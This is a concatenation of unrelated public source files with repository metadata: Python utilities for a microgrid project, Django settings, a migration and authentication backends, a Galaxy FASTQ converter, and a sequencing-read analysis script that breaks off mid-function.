ea813d8e45f7b745a66a56a76d234e91e1964422 | 1e4c88fd3ebe722d5b917283841edd8ca398ad85 | /project-thesis/utils/helpers.py | 6f96bb57155ad375fa4b80547e4e217a5db569b4 | [] | no_license | mfkiwl/microgrid-mpc | 6de8ad1e4e59a5f0ebcdfd1a7846dab21c0aed88 | 88e3d4eeb28def3250c5769259854169565ec0df | refs/heads/master | 2023-03-20T19:47:00.758575 | 2021-03-18T14:01:28 | 2021-03-18T14:01:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,603 | py | import os
import shutil
import yaml
import pandas as pd
import numpy as np
from datetime import datetime
def parse_config():
"""
Parses and returns configfile as dict
"""
with open("./config.yml", "r") as f:
conf = yaml.load(f, Loader=yaml.FullLoader)
return conf
def create_folder(folderpath):
"""
Creates a folder
"""
if not os.path.exists(folderpath):
os.makedirs(folderpath)
def create_logs_folder(rootdir="./logs/", foldername=""):
"""
Creates a unique folder for the current run
"""
now = datetime.now()
time = now.strftime("%d.%m-%H:%M")
folderpath = rootdir + time + "-" + foldername + "/"
create_folder(folderpath)
# Save files in logs
files = ["./config.yml", "./main.py", "./solver.py"]
for f in files:
shutil.copyfile(f, folderpath + f)
return folderpath
def load_data():
""""""
conf = parse_config()
datafile = conf["datafile"]
data = pd.read_csv(datafile)
if "P1" in data.columns:
PL = (data.P1 + data.P2).to_numpy()
else:
PL = data.PL.to_numpy()
PV = data.PV.to_numpy()
if "Spot_pris" in data.columns:
grid_buy = grid_sell = data.Spot_pris.to_numpy()
else:
grid_buy = grid_sell = 1.5
if "PV_pred" not in data.columns:
PV_pred = PV.copy()
PL_pred = PL.copy()
else:
PV_pred = data.PV_pred.to_numpy()
PL_pred = data.PL_pred.to_numpy()
return PV, PV_pred, PL, PL_pred, grid_buy, grid_sell
def print_stats(PV, PL, PV_pred, PL_pred):
print(
"Predicted energy produced {}, predicted energy consumed {}".format(
np.sum(PV_pred), np.sum(PL_pred)
)
)
print(
"Actual energy produced {}, actual energy consumed {}".format(
np.sum(PV), np.sum(PL)
)
)
print("Predicted energy surplus/deficit:", np.sum(PV_pred) - np.sum(PL_pred))
print("Actual energy surplus/deficit:", np.sum(PV) - np.sum(PL))
def save_datafile(signals, names=[], logpath=None):
"""
Saves all signals in a csvfile called signals.csv
"""
if not logpath:
return
data = {}
for i in range(len(names)):
data[names[i]] = signals[i]
df = pd.DataFrame.from_dict(data, orient="index")
df = df.transpose()
df.to_csv(logpath + "signals.csv")
def check_constrain_satisfaction(u0, u1, u2, u3, pv, l):
residual = -u0 + u1 + u2 - u3 + pv - l
if residual > 1:
print("Constraint breached")
raise ValueError
if __name__ == "__main__":
parse_config() | [
"theodoth@stud.ntnu.no"
] | theodoth@stud.ntnu.no |
3e133354e43b89e7295c144c2f2a31d3288cbc8c | dc50cc0f2b08ece2a084ef2a63718594c5e41187 | /miverr/miverr/settings.py | 681b60b7bb99dba444a776b5fcf1abf4b87f3af3 | [] | no_license | mayank6/miverr | 7162aded9569e19df3035a22f953148f76afbbbe | 4be95a052b1ceae8529969ba6c09c560ca8fac5e | refs/heads/master | 2020-04-16T22:33:22.474530 | 2019-11-02T05:35:33 | 2019-11-02T05:35:33 | 165,973,281 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,749 | py | """
Django settings for miverr project.
Generated by 'django-admin startproject' using Django 1.11.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'htan(m@+@&*)f%@+$te@n)x0e*kh@)kp87vk7(^r2-jjjd8y8-'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites', # new
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
'miverrapp',
'users',
'widget_tweaks',
]
AUTH_USER_MODEL = 'users.CustomUser'
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
AUTHENTICATION_BACKENDS = (
"users.backend.EmailBackend",
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
)
SITE_ID = 1
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_USERNAME_REQUIRED = True
ROOT_URLCONF = 'miverr.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'miverr.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
#'/var/www/static/',
]
STATIC_ROOT=os.path.join(BASE_DIR,'static_cdn')
MEDIA_ROOT=os.path.join(BASE_DIR,'media_cdn')
MEDIA_URL='/media/'
LOGIN_REDIRECT_URL = 'miverrapp:home'
LOGOUT_REDIRECT_URL = 'miverrapp:home'
| [
"chauhanmayank.621@gmail.com"
] | chauhanmayank.621@gmail.com |
e962b54ec262cb0e8a2b1e534a1193f362ac6c0e | 6e8d58340f2be5f00d55e2629052c0bbc9dcf390 | /lib/galaxy/datatypes/converters/fastqsolexa_to_fasta_converter.py | 1b68b3f6a2a340f24a5357a700a8e9995715fcc1 | [
"CC-BY-2.5",
"MIT"
] | permissive | JCVI-Cloud/galaxy-tools-prok | e57389750d33ac766e1658838cdb0aaf9a59c106 | 3c44ecaf4b2e1f2d7269eabef19cbd2e88b3a99c | refs/heads/master | 2021-05-02T06:23:05.414371 | 2014-03-21T18:12:43 | 2014-03-21T18:12:43 | 6,092,693 | 0 | 2 | NOASSERTION | 2020-07-25T20:38:17 | 2012-10-05T15:57:38 | Python | UTF-8 | Python | false | false | 1,781 | py | #!/usr/bin/env python
"""
convert fastqsolexa file to separated sequence and quality files.
assume each sequence and quality score are contained in one line
the order should be:
1st line: @title_of_seq
2nd line: nucleotides
3rd line: +title_of_qualityscore (might be skipped)
4th line: quality scores
(in three forms: a. digits, b. ASCII codes, the first char as the coding base, c. ASCII codes without the first char.)
Usage:
%python fastqsolexa_to_fasta_converter.py <your_fastqsolexa_filename> <output_seq_filename> <output_score_filename>
"""
import sys, os
from math import *
assert sys.version_info[:2] >= ( 2, 4 )
def stop_err( msg ):
sys.stderr.write( "%s" % msg )
sys.exit()
def __main__():
infile_name = sys.argv[1]
outfile = open( sys.argv[2], 'w' )
fastq_block_lines = 0
seq_title_startswith = ''
for i, line in enumerate( file( infile_name ) ):
line = line.rstrip() # eliminate trailing space and new line characters
if not line or line.startswith( '#' ):
continue
fastq_block_lines = ( fastq_block_lines + 1 ) % 4
line_startswith = line[0:1]
if fastq_block_lines == 1:
# line 1 is sequence title
if not seq_title_startswith:
seq_title_startswith = line_startswith
if seq_title_startswith != line_startswith:
stop_err( 'Invalid fastqsolexa format at line %d: %s.' %( i + 1, line ) )
read_title = line[ 1: ]
outfile.write( '>%s\n' % line[1:] )
elif fastq_block_lines == 2:
# line 2 is nucleotides
read_length = len( line )
outfile.write( '%s\n' % line )
else:
pass
outfile.close()
if __name__ == "__main__": __main__() | [
"root@ip-10-118-137-129.ec2.internal"
] | root@ip-10-118-137-129.ec2.internal |
87faeec665f0d69a553547f26f7095e0c623830a | e9f90d1ba4247c01f59c313179f1ef005885aaba | /vanhanh/migrations/0010_auto_20200104_1715.py | 6e0ed55c009a80889c24a9a18dc48d49d5ce393f | [] | no_license | hangockhue/khovanhanh | aef9ad39822902dea621512b97a485bc7d123bee | d5b3ca103abd4e20a80db8f43768a68d7adab9dc | refs/heads/master | 2022-04-17T18:02:11.526517 | 2020-04-20T08:06:11 | 2020-04-20T08:06:11 | 231,758,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,060 | py | # Generated by Django 2.1.7 on 2020-01-04 10:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('vanhanh', '0009_auto_20200104_1108'),
]
operations = [
migrations.CreateModel(
name='Grouptype',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50, verbose_name='Loại chung')),
('highlight', models.BooleanField(default=True, verbose_name='Hiển thị title')),
],
options={
'verbose_name': 'Grouptype',
'verbose_name_plural': 'Nhóm sản phẩm',
},
),
migrations.AddField(
model_name='typeproduct',
name='group_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='vanhanh.Grouptype'),
),
]
| [
"khueha@nhaphangmy.com"
] | khueha@nhaphangmy.com |
c919cdecfb3d5c8c9d2226857ccc3bde41f66df1 | b61021e87abc2e075448d57e5402cdebcd12bd48 | /dogs/dog_app/backends.py | 6a9ef437525428c13532ea23458f0ee2dbca3df5 | [] | no_license | kapilarj/Dogs | 86bbb08f10d48603a03f095b596573e8484ae94b | 919ea5073e8ca656ffcab93d51b0e66d9dc56af9 | refs/heads/master | 2020-03-22T21:14:13.510952 | 2018-07-12T06:10:16 | 2018-07-12T06:10:16 | 140,669,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,524 | py | from .models import MyUser
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth import get_user_model
class EmailBackend(ModelBackend):
def authenticate(self, username=None, password=None, **kwargs):
try:
User = get_user_model()
user = User.objects.get(email=username)
except User.MultipleObjectsReturned:
user = User.objects.filter(email=username).order_by('id').first()
except User.DoesNotExist:
return None
if getattr(user, 'is_active') and user.check_password(password):
return user
return None
def get_user(self, user_id):
try:
User = get_user_model()
return User.objects.get(pk=user_id)
except User.DoesNotExist:
return None
class MobileBackend(ModelBackend):
def authenticate(self, username=None, password=None, **kwargs):
try:
User = get_user_model()
user = User.objects.get(contact=username)
except User.MultipleObjectsReturned:
user = User.objects.filter(contact=username).order_by('id').first()
except User.DoesNotExist:
return None
if getattr(user, 'is_active') and user.check_password(password):
return user
return None
def get_user(self, user_id):
try:
User = get_user_model()
return User.objects.get(pk=user_id)
except User.DoesNotExist:
return None
| [
"kapilarj1997@gmail.com"
] | kapilarj1997@gmail.com |
7dfb68686c9a59b99f7f8d890830641ddf2a6f54 | ab61eb4b5251d46b1fa2d6f0342ac48de9cae851 | /import_analysis.py | 2ad25fd884043a9975d7c0cd87fdd5eaaaa75fca | [] | no_license | aaroncp1an0/TRIDENT | 9eda6dac7025f0faceef1bb7b9fc03aa118862ed | 00188498273db18c51217cad1572e13d2b9be756 | refs/heads/master | 2021-07-03T08:29:35.133652 | 2020-10-26T03:36:52 | 2020-10-26T03:36:52 | 191,283,849 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 41,586 | py | #!/usr/bin/python3
import numpy as np
#import str as str
import sys
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from matplotlib import colors
np.set_printoptions(suppress=True)
########################################
########################################
#start of module functions
#FUNCTIONS FOR TAKING TWO OVERLAPPING READS AND COMBINING THEIR Q-scores in the region of overlapp
#input: FASTQ-bowtie paired reads
#output: SINGLE FASTQ READ in bowtie output format
intab = b"ATCG"
outtab = b"TAGC"
tabCOMP = bytes.maketrans(intab, outtab) #makes sequence complement
intab = b"ATCGN"
outtab = b"01234"
tabHOT = bytes.maketrans(intab, outtab) #translate a sequence to one-hot encoding
#FUNCTION FOR COMPUTING SEQUENCE/Q SCORE MATRIX for two FASTQ files
def SeqScoreMAKER(filename1, filename2, filename3, qscoremesh=[20,25,30,33,35,37,40], cutoff=5, seqlength=2300, verbose=False):
#FUNCTION FOR COMPUTING SEQUENCE/SCORE MATRIX for two FASTQ files
#calls 1. open files
# file1=fq1.bowtie aligned; file2=fq2.bowtie aligned; file3=fq1 original non-aligned
# 2. plan cycling and comparison of paired/unpaired
# -single/paired function call
# -sequence/score matrix increment
# 3. next cycle
print("warning: remember to edit code if there is substantial paired-end overlap. like for a 300x300 library!")
##################################
#INITIATE VARIABLES
#Qmap: 0-20 -> 0; 20:25(1) 27-40(2) 31-40(3) 33-40(4) 35-40(5) 37-40(6) 39,40(7)
#Qscoremesh should be entered into here
Qtab=bytes.maketrans(b"!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJ", b"000000000000000000001111122222334456788999")
# 0 0000000000000000000111112222233445678899
#initializes 2300x4 matrix, where SSM[0] references position 1, with [A,T,C,G] indexes
SSM=np.zeros((seqlength,5))
#files are new!
endfile1, endfile2 = False, False
count=0
##################################
#BEGIN MAIN FUNCTION EXECUTION
#open filehooks
f1, f2, f3 = readout(filename1, filename2, filename3)
#print(f1, f2)
FQstring1 = returnparsed(f1.readline(), Qtab)
#read first line of each FASTQ bowtie paired file
try: FQstring1 = returnparsed(f1.readline(), Qtab)
except: print('empty files')
try: FQstring2 = returnparsed(f2.readline(), Qtab)
except: print('empty files')
###########################ALTERANTIVE FUNCTION (NON DUAL USAGE, NON OVERLAPPING)
#this will only enter strings which are overlapping
if True:
print('USING NON-OVERLAP PROCESSING, largest possible dataset post-processing')
Nover, Nexcept = 0, 0
#
#initialize a counter for making a histogram of how many mutations there are per string
mutHIST=np.zeros(40)
#
for line in f1:
###updating SSM
#print(FQstring1)
try: SSM = updateSSmatrix(FQstring1[1][1],FQstring1[1][2],SSM,FQstring1[1][0],cutoff=cutoff)
except: print('!! 1 instance of SSM update fail exception !!')
#increment f1 to the next line in the file
try: FQstring1 = returnparsed(f1.readline(), Qtab)
except: endfile1=True
for line in f2:
###updating SSM
try: SSM = updateSSmatrix(FQstring2[1][1],FQstring2[1][2],SSM,FQstring2[1][0],cutoff=cutoff)
except: print('!! 1 instance of SSM update fail exception !!')
#increment f1 to the next line in the file
try: FQstring2 = returnparsed(f2.readline(), Qtab)
except: endfile2=True
if endfile1 and endfile2:
print('exiting')
f1.close()
f2.close()
f3.close()
return SSM
#
#in case we might want to record # mutations per read....
#print( np.round( 100*mutHIST[:7]/np.sum(mutHIST), 2 ) )
#print("{0:.3f}".format( np.round( 100*mutHIST[:7]/np.sum(mutHIST), 2 ) ) )
return SSM
#GENERAL PROCESSOR - CAN BE PAIRED ENDS OR NOT
######################3
for line in f3: #read a single line from f3, will compare f1 and f2 indexe to see if they match?
#this function will now search for paired reads, or act on unpaired reads which lack quality pairingix
#print('using NON-DualStrict processing')
#process out the read number information using split
FQstring3 = line.split()[0].split(':')[5:]
#IF READ INDEX MATCHES MAIN FILE (F3) in either f1:reference or f2:reference, proceed to computations
if FQstring1[0] == FQstring3 or FQstring2[0] == FQstring3:
if verbose: print('updating')
if verbose: print(FQstring1)
#does f1=f2?
#yes? - execute overlap function and pairing and read next lines of f1,2,3
if True:
#execute single function, and update f1
###UPDATE COUNTER HERE
try: SSM = updateSSmatrix(FQstring1[1][1],FQstring1[1][2],SSM,FQstring1[1][0],cutoff=cutoff)
except: print('!! 1 instance of SSM update fail exception !!')
#increment f1 to the next line in the file
try: FQstring1 = returnparsed(f1.readline(), Qtab)
except: endfile1=True
###execute single function, and update f2 and UPDATE COUNTER HERE
try: SSM = updateSSmatrix(FQstring2[1][1],FQstring2[1][2],SSM,FQstring2[1][0],cutoff=cutoff)
except: print('!! 1 instance of SSM update fail exception !!')
#increment f2 to the next line in the file
try: FQstring2 = returnparsed(f2.readline(), Qtab)
except: endfile2=True
elif FQstring1[0] == FQstring3:
#execute single function, and update f1
###UPDATE COUNTER HERE
try: SSM = updateSSmatrix(FQstring1[1][1],FQstring1[1][2],SSM,FQstring1[1][0],cutoff=cutoff)
except: print('!! 1 instance of SSM update fail exception !!')
#increment f1 to the next line in the file
try: FQstring1 = returnparsed(f1.readline(), Qtab)
except: endfile1=True
elif FQstring2[0] == FQstring3:
#execute single function, and update f2
###UPDATE COUNTER HERE
try: SSM = updateSSmatrix(FQstring2[1][1],FQstring2[1][2],SSM,FQstring2[1][0],cutoff=cutoff)
except: print('!! 1 instance of SSM update fail exception !!')
#increment f2 to the next line in the file
try: FQstring2 = returnparsed(f2.readline(), Qtab)
except: endfile2=True
#just increment f3 at the begining of the next for loop
else: pass
#just increment f3 at the beginning of the next for loop
else: pass
if endfile1 and endfile2:
print('exiting')
f1.close()
f2.close()
f3.close()
return SSM
return SSM
def SeqLength(filename1, filename2, filename3, qscoremesh=[20,25,30,33,35,37,40], cutoff=5, seqlength=2300, verbose=False):
#FUNCTION FOR COMPUTING SEQUENCE/SCORE MATRIX for two FASTQ files
#calls 1. open files
# file1=fq1.bowtie; file2=fq2.bowtie; file3=fq1 original
# 2. plan cycling and comparison of paired/unpaired
# -single/paired function call
# -sequence/score matrix increment
# 3. next cycle
print("warning: remember to edit code if there is substantial paired-end overlap. like for a 300x300 library!")
##################################
#INITIATE VARIABLES
#Qmap: 0-20 -> 0; 20:25(1) 27-40(2) 31-40(3) 33-40(4) 35-40(5) 37-40(6) 39,40(7)
#Qscoremesh should be entered into here
Qtab=bytes.maketrans(b"!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHI", b"00000000000000000000111112222334455667788")
#initializes 2300x4 matrix, where SSM[0] references position 1, with [A,T,C,G] indexes
SSM=np.zeros((seqlength,5))
Lrecord=np.zeros(5000)
#files are new!
endfile1, endfile2 = False, False
count=0
##################################
#BEGIN MAIN FUNCTION EXECUTION
#open filehooks
f1, f2, f3 = readout(filename1, filename2, filename3)
#read first line of each FASTQ bowtie paired file
try: FQstring1 = returnparsed(f1.readline(), Qtab)
except: print('empty files')
try: FQstring2 = returnparsed(f2.readline(), Qtab)
except: print('empty files')
for line in f3: #read a single line from f3, will compare f1 and f2 indexe to see if they match?
#this function will now search for paired reads, or act on unpaired reads which lack quality pairingix
#process out the read number information using split
FQstring3 = line.split()[0].split(':')[5:]
#IF READ INDEX MATCHES MAIN FILE (F3) in either f1:reference or f2:reference, proceed to computations
if FQstring1[0] == FQstring3 or FQstring2[0] == FQstring3:
if verbose: print('updating')
if verbose: print(FQstring1)
if FQstring1[0] == FQstring2[0]:
#execute overlap function and pairing
#update read f1 and f2 (f3 is taken care of by the main counter)
#####NEED TO RETURN foverlap, in the same format as FQstring!
###UPDATE COUNTER HERE
#SSM = updateSSmatrix(foverlap[1,1],foverlap[1,2],SSM,foverlap[1,0],cutoff)
#all fixed
x=int(np.abs(int(FQstring1[1][0])-int(FQstring2[1][0])))
try: Lrecord[x]+=1
except: print('!! 1 instance of SSM dual update fail exception !!')
#lenthrec[]+=1
#increment f1 and f2 to the next line in the file
#exception method for boolean testing of file end
try: FQstring1 = returnparsed(f1.readline(), Qtab)
except: endfile1=True
try: FQstring2 = returnparsed(f2.readline(), Qtab)
except: endfile2=True
#does f1=f2?
#yes? - execute overlap function and pairing and read next lines of f1,2,3
elif FQstring1[0] == FQstring3:
#execute single function, and update f1
###UPDATE COUNTER HERE
#increment f1 to the next line in the file
try: FQstring1 = returnparsed(f1.readline(), Qtab)
except: endfile1=True
elif FQstring2[0] == FQstring3:
#execute single function, and update f2
###UPDATE COUNTER HERE
#increment f2 to the next line in the file
try: FQstring2 = returnparsed(f2.readline(), Qtab)
except: endfile2=True
#just increment f3 at the begining of the next for loop
else: pass
#just increment f3 at the beginning of the next for loop
else: pass
if endfile1 and endfile2:
print('exiting')
f1.close()
f2.close()
f3.close()
return Lrecord
return Lrecord
#plan out end-logic and exception states
#PART OF THE PARSING FUNCTION
def returnparsed(fastq, Qtab):
y=fastq.split()
#Bowtie already flips reads to fwd position
#if y[2] == '-':
# y[5]=y[5].translate(tab)[::-1]
# y[6]=y[6][::-1]
y[6]=y[6].translate(Qtab)
#output: [['23140', '15797'],['1994','CATCAACACAGCAGATA','558888777555570']]
return [y[0].split(':')[-2:], y[4:7]]
#PART OF THE PARSING FUNCTION
#FUNCTION FOR OUTPUTING LINES FROM TWO FILES:
def readout(filename1, filename2, filename3):
#input, filenames
#output, fileholders
#open files with 'holders'
#options to extract filenames from shell command: filename1=str(sys.argv[1])
try: filehold1=open(filename1,'r')
except: print(filename1+str(' failed to open'))
try: filehold2=open(filename2,'r')
except: print(filename2+str(' failed to open'))
try: filehold3=open(filename3,'r')
except: print(filename3+str(' failed to open'))
return filehold1, filehold2, filehold3
#PART OF THE PARSING FUNCTION
def updateSSmatrix(read,scores,SSM,pos=0,cutoff=3, tabhot=None, verbose=False): #FUNCTION takes read/scores and increments SSM-matrix at bases which meet the cutoff criteria
#output, returns SSM matrix
if verbose: print(read)
if verbose: print(scores)
readHOT = np.array(list(read.translate(tabHOT)), dtype=int)
scoresH = np.array(list(scores), dtype=int)
####
####STRICT NEIGHBORING SCORES... means we require the +1 and -1 positions to have high Qscores
if False:
scoresH+=np.roll(scoresH, 1)
scoresH+=np.roll(scoresH, -1)
scoresM = np.zeros(len(scoresH)) #scoresM is the 0,1 multiplier
scoresM[scoresH>cutoff*3]=1 #set scoresM=1 where scoresH (one-hot) meets the cutoff
else:
scoresM = np.zeros(len(scoresH)) #scoresM is the 0,1 multiplier
scoresM[scoresH>cutoff]=1 #set scoresM=1 where scoresH (one-hot) meets the cutoff
#pulls out index by position, then only those indexes referenced in A,T,C,G.
#Pulled out indexes are then incremented by +1 according to scores, so only bases passing filter are accounted for
SSM[np.arange(int(pos),int(pos)+len(read),1),readHOT]+=scoresM
#returns incremented SSM matrix
return SSM
#PART OF THE PARSING FUNCTION
def updateSSmatrixDUAL(read1,read2,scores1,scores2,SSM,pos1=0,pos2=0,cutoff=3, tabhot=None, verbose=False): #FUNCTION takes read/scores and increments SSM-matrix at bases which meet the cutoff criteria
#output, returns SSM matrix
#print('in SSDUAL update')
if verbose: print(read1)
if verbose: print(scores)
pos1, pos2 = int(pos1), int(pos2)
if abs(pos1-pos2)>=max(len(read1), len(read2)):
SSM = updateSSmatrix(read1,scores1,SSM,pos1,cutoff,tabhot,verbose)
SSM = updateSSmatrix(read2,scores2,SSM,pos2,cutoff,tabhot,verbose)
return SSM
#print(readHOT1, readHOT2)
#print(scoresH1, scoresH2)
elif pos1 < pos2 and abs(pos1-pos2)<len(read1):
readHOT1 = np.array(list(read1.translate(tabHOT)), dtype=int)
readHOT2 = np.array(list(read2.translate(tabHOT)), dtype=int)
scoresH1 = np.array(list(scores1), dtype=int)
scoresH2 = np.array(list(scores2), dtype=int)
readNEW = np.zeros(len(read2)+pos2-pos1, dtype=int) #new read with terminal at pos1 going out to pos2+read2 length
scoresN = np.zeros(len(read2)+pos2-pos1, dtype=int)
#assign 1) read1 to the NEW sequences
#assign 2) read2 to the NEW sequences: not the overlap region will have 2x the value as it normally should
readNEW[:len(readHOT1)], scoresN[:len(readHOT1)] = readHOT1, scoresH1
#print(readNEW)
if verbose: print(readNEW, readHOT2, pos2, pos1, len(readHOT1), len(readNEW), len(readHOT2))
readNEW[len(readHOT1):] += readHOT2[len(readHOT1)-pos2+pos1:]
#print(readNEW)
scoresN[pos2-pos1:] += scoresH2
#if there is NOT agreement in the overlap between read1 and read2, set score to 0
#print(len(scoresN[pos2:]))
#print(readNEW)
#print(scoresN)
scoresN[pos2-pos1:][readNEW[pos2-pos1:]!=readHOT2] = 0
#for the regions where there are agreement, set the score to 60 - we basically know this is the base
#formally, we could add the two scores to get the actual number
#scoresN[pos2-pos1:][readNEW[pos2-pos1:]==readHOT2] = 60
#print(scoresN, readNEW)
#0,1 multiplier scoresM; assign 1 depending on cutoff, pull out and add one to all proper positions
scoresM = np.zeros(len(scoresN), dtype=int)
scoresM[scoresN>cutoff]=1
SSM[np.arange(int(pos1),int(pos1)+len(readNEW),1),readNEW]+=scoresM
elif pos1 > pos2 and abs(pos1-pos2)<len(read2):
SSM = updateSSmatrixDUAL(read2,read1,scores2,scores1,SSM,pos2,pos1,cutoff, tabhot=None, verbose=False)
return SSM
############
############FILE HANDLING TOOLS
def load_files(filelist,pathA='./ip_M',pathB='',only4=True):
#pathA/filelist#/pathB
#ip_Ms4_S1
M = []
for name in filelist:
M.append(np.load(pathA+name+pathB))
return M
def moving_average(a, n=3) :
#a[0,a[0,:]>.95]=0
ret = np.cumsum(a, dtype=float)
ret[n:] = ret[n:] - ret[:-n]
return ret[n - 1:] / n
def M_norm(M):
if len(np.shape(M)) > 1:
norm=np.sum(M,axis=1,dtype=float)
norm[norm==0]=1.0
Mnorm=(1.0/norm)*M.T
else:
norm=np.sum(M)
Mnorm=(1.0/norm)*M
return Mnorm
def plot_i_average(Mnormarray,i=0,N=5,log=True,limitsy=[.000001,.01],limitsx=[750,1150],cutoff=.3):
for array in Mnormarray:
y=array[i,array[i,:]<cutoff]
m=moving_average(y,n=N)
#print(len(m.T))
plt.plot(range(len(m)),m.T)
plt.ylim(limitsy)
plt.xlim(limitsx)
if log: plt.yscale('log')
else: pass
def plot_counts(Marray):
#for plotting the total read count arrays, sanity checks
try:
for array in Marray:
plt.plot(range(len(array)), np.sum(array, axis=1))
except:
plt.plot(range(len(Marray)), np.sum(Marray, axis=1))
def plot_NtoN(Mnormarray,baseStart='A',baseEnd='T',N=20,log=True,limitsy=[.000001,.01],limitsx=[750,1150],cutoff=.3, lims=True, ASScolor=True, colors=['gold'], linewidth=1, remove_out=True):
lookup={'A':0,'T':1,'C':2,'G':3}
start=lookup[baseStart]
end=lookup[baseEnd]
i=0
for array in Mnormarray:
#print(Mnormarray)
xA = array[start,:]>.8
x, y = np.arange(0,len(xA))[xA], array[end,xA]
#print(len(m.T))
###OPTIONAL ANALYSIS FOR OUTLIER REMOVAL
###calculating mean and stddev, use these to remove points > 3stddev from mean (calculated w/o zero points)
###we then repeat this processing on the new data points in order to correct for re-calculation of the mean/stddev
###this processes only changes the moving average curve by removing extreme outliers; mostly correcting at the T-rich promoter
if remove_out: #remove_outl
##PARAMETERS of
#number of standard deviations*N + mean to allow outliers in
#reAveraging substitution window (what value to swap with)
NUMstd, AVE = 3, 30
#FIRST PASS OF REPLACEMENTS
#calculate outlier index positions, outLys1
mean = np.average(y[20:-20])
stdD = np.std(y[y!=0][20:-20])
outLys1 = y>NUMstd*stdD+mean
#replace outLys1
y[0:1-AVE][outLys1[0:1-AVE]]=moving_average(y, n=AVE)[outLys1[0:1-AVE]]
#SECOND PASS OF REPLACEMENTS, accounting for new mean; stdDev
#calculate outlier index positions, outLys2
mean = np.average(y[20:-20])
stdD = np.std(y[y!=0][20:-20])
outLys2 = y>NUMstd*stdD+mean
#replace outLys2
y[0:1-AVE][outLys2[0:1-AVE]]=moving_average(y, n=AVE)[outLys2[0:1-AVE]]
#re-replace outLys1, accounting for new averaging values
y[0:1-AVE][outLys1[0:1-AVE]]=moving_average(y, n=AVE)[outLys1[0:1-AVE]]
#re-replace outLys2, accounting for new averaging values
y[0:1-AVE][outLys2[0:1-AVE]]=moving_average(y, n=AVE)[outLys2[0:1-AVE]]
m = moving_average(y, n=N)
#m = RunningMedian(y, M=N)
#print(np.shape(x))
if ASScolor: plt.plot(x[:len(m)],m, color=colors[i], linewidth=linewidth)
else: plt.plot(x[:len(m)],m, linewidth=linewidth)
#update color index
i+=1
if lims:
plt.ylim(limitsy)
plt.xlim(limitsx)
if log: plt.yscale('log')
else: pass
return plt
def plot_ATCG_freq(Mnorm_single, base='A', log=True, area=.3, limitsy=[.0000001,.1],limitsx=[750,1150]):
#input single base matrix array
#output single plot w/ ATCG output mutations for a single starting base
lookup = {'A':0,'T':1,'C':2,'G':3}
i=lookup[base]
#np.max(Mnorm_single[:,:],axis=1)
xA = Mnorm_single[i,:]>.93 #pull out all i values
plt.scatter(range(len(Mnorm_single.T)), Mnorm_single.T[:,0]*xA, s=area, color='red')
plt.scatter(range(len(Mnorm_single.T)), Mnorm_single.T[:,1]*xA, s=area, color='green')
plt.scatter(range(len(Mnorm_single.T)), Mnorm_single.T[:,2]*xA, s=area, color='blue')
plt.scatter(range(len(Mnorm_single.T)), Mnorm_single.T[:,3]*xA, s=area, color='purple')
plt.ylim(limitsy)
plt.xlim(limitsx)
if log: plt.yscale('log')
def runA_heatmap(Mctrlnorm, Msamplenorm, maskCT=False, maskTC=False,
samplename='temp', filename='temp', sumX1X2=[900,1100], nozeros=True,
SAVEFIG=False, normalize=True, directory='2017_analysis/'):
#EXAMPLE RUN:
#runA_heatmap(M1norm, M3norm, maskCT=False, maskTC=False,
# samplename='EXO1', filename='EXO1minusM2', sumX1X2=[900,1100], nozeros=True,
